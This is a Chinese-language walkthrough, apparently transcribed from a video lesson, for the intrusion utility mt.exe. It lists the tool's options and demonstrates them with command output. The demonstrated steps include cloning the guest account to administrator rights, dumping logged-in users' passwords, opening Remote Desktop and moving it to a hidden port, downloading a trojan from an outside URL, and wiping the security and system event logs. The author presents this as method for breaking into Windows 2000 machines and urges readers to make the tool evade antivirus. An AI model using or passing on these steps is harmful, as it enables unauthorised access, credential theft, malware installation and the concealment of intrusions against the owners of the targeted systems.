用法:
mt.exe <选项>
选项 :
-filter ---更 改 TCP/IP 过滤器的开头状态
-addport ---添加端口到过滤器的允许列表
-setport ---设置端口作为过滤 器的允许列表
-nicinfo ---列出 TCP/IP 界面信息
-pslist ---列出活动进程
-pskill --- 杀毒指定进程
-dlllist ---列出指定进程的 DLL
-sysinfo ---列出系统信息
-shutdown --- 关闭系统
-reboot ---重启系统
-poweroff ---关闭电源
-logoff ---注销当前用户会话
-chkts --- 检查终端服务信息
-setupts ---安装终端服务
-remts ---卸载终端服务
-chgtsp ---重置终端 服务端口
-clog ---清除系统日志
-enumsrv ---列出所有服务
-querysrv ---列出指定服务的 详细信息
-instsrv ---安装一个服务
-cfgsrv ---更改服务配置
-remsrv ---卸载指定服务
-startsrv --- 启动指定服务
-stopsrv ---停止指定服务
-netget ---从 http/ftp 下载
-redirect --- 端口重定向
-chkuser ---列出所有账户、sid 和 anti 克隆
-clone ---克隆 admin 到目标
-never --- 设置账户看上去从未登录
-killuser ---删除账户,甚至是 "guest" 也可删除
-su --- 以 Local_System 权限运行进程
-findpass ---显示所有已登录用户的口令
-netstat ---列 出 TCP 连接
-killtcp ---杀死 TCP 连接
-psport ---映射端口到进程
-touch --- 设置文件日期和时间到指定值
-secdel ---安全擦除文件或目录占用的空间
-regshell ---进入一个控制台注册表编 辑器
-chkdll ---检测 gina dll 后门
1.
mt -sysinfo 查看机器配置
先来看一下..看到没??这里就会列举出来本机的各种配置信息....看下面.这里面列举了现在系统打过的补丁,这里显示了本机硬件的配 置..CPU等..这里显示了本机IP地址,子网,和网关...
2.type c:\boot.in 查看启动文件
这主要是调 用了c:\boot.i 这个文件,就是开机的双启动菜单,通过它来查看本机用的是什么系统.这里多说一个.. VER功能和它也是一样的.它是系统命令..
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastd
etect
C:\>ver
Microsoft Windows 2000 [Version 5.00.2195]
看到了吧?2000的系统..
3.
mt -clone Administrator guest 意思是把guest克隆为管理员(必需是系统权
限才能运行)
4.
mt -chkuser 查看自己机器里是否有克隆的帐户
用它也可以来查看自己的机器是否被人克隆 了帐户..
看到了吧..
5.
mt -findpass 查看管理员密码(仅2000/2003)
这个功能和一个 findpass的功能是一样的.
C:\>
mt -findpass
The logon information :
Domain : 77AFCF2E775047B
Username : Administrator
Password : 123
看到了吧?我系统的密码就是123
6.
mt -pslist 查看进程
此功能是在DOS下显示主机现在正在运行的程序.如果是在XP下
我 们就可以直接用tasklist 就可以了...担在2000下不技术
就这样子..看到了吧?
再试个..
关它..
7.
mt -pskill 杀除进程
些功能就是杀掉某个进程,这里我们可以试一下.
现在我们来关掉932这个进程..
C:\>mt -pskill 772
Kill process sccuessful!
已经关掉了..
8.
mt -setupts 安装终端服务(仅2000/2003好用)
这里说明下,我们平时我们在入 侵2000的机器时有时开不了3389,那是因为只有2000服务器版的系统才能开3389,如果不是服务器版的,是开不了3389的,这也是有很多人不 问为什么就一直开3389而打不开的原因..
我虚拟机不是服务器的,所以打不开..就是这意思..
9.
mt -chgtsp 1030 改终端端口
当我们开了对方机子3389后,主人很容易会发现开 放,那我们可以把3389的端口给改这样只有我们自己去用它...
1030 这个改成你想要的端口..
10.
mt -reboot 重启
不带有任何提示,直接重启....一会我试下..
11
.mt -netget http://或者ftp://www.你木马的地址 c:\1.exe 下载木马
功能和vget是一样的,我们来试下..
Fail to open registy key...
C:\>mt -netget http://user.free2.77169.net/didiaoyin/mm.exe c:\mm.exe
Download File from http://user.free2.77169.net/didiaoyin/mm.exe to c:\
Download completed 290817 bytes ......
Downloaded 284.0KB @94.7KB/S in 2sec.
File <c:\mm.exe> TotalByte : 284 KB.
看到了吧?现在来看一下..我的鸽子...
12.
mt -clog all 删除所有应用程序,系统,日志等
这个都明白吧...
C:\>mt -clog all
Clean EventLog : Application successful!
Clean EventLog : Security successful!
Clean EventLog : System successful!
这样就把日志都删除了...
13.
mt -dlllist 列出进程DLL
格式是
mt -dlllist 进程号
这样就可以把对应进程号的进程显示出所有的DLL文件
这个在我们查马时很有用..
此功能目的是列出进程的DLL文件,我们来看下..
14.
mt -poweroff 关掉电源。
没什么好说的,直接关机..
15.
mt -logoff 注销
直接注销.
16.
mt -shutdown 关机(都不会有任何提示)
关机..
17.
mt -chkts 检查终端信息
没有.
18.
mt -remts 卸载终端服务
这个就和刚才的那个8.mt -setupts 是对应的,卸载终端...
好了,
MT的基本用法就这么多,功能还是很多的...担是现在杀软都杀它..我们要自己做免杀...
现 在来试下
mt -logoff 这个吧,注销,看下效果..关机也是一样的..